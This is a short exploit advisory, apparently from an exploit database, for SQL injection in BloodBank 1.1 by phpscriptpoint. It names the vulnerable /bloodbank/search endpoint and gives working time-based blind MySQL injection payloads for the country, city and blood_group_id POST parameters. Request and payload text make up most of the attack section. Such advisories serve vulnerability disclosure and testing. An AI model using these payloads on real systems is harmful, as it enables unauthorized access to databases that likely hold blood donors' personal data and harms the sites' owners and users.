Authored by CraCkEr

BloodBank version 1.1 suffers from a remote SQL injection vulnerability.

# Exploit Title: BloodBank 1.1 - SQL Injection
# Exploit Author: CraCkEr
# Date: 15/07/2023
# Vendor: phpscriptpoint
# Vendor Homepage: https://phpscriptpoint.com/
# Software Link: https://demo.phpscriptpoint.com/bloodbank/
# Tested on: Windows 10 Pro
# Impact: Database Access



## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.



Path: /bloodbank/search

POST parameter 'country' is vulnerable to SQL Injection
POST parameter 'city' is vulnerable to SQL Injection
POST parameter 'blood_group_id' is vulnerable to SQL Injection


-----------------------------------------------------------
POST /bloodbank/search HTTP/2

country=[SQLI]&city=[SQLI]&blood_group_id=[SQLI]&form_search=Search+Donor
-----------------------------------------------------------


---
Parameter: country (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: country=123'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&city=123&blood_group_id=2&form_search=Search+Donor

Parameter: city (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: country=123&city=123'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&blood_group_id=2&form_search=Search+Donor

Parameter: blood_group_id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: country=123&city=123&blood_group_id=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&form_search=Search+Donor
---



[-] Done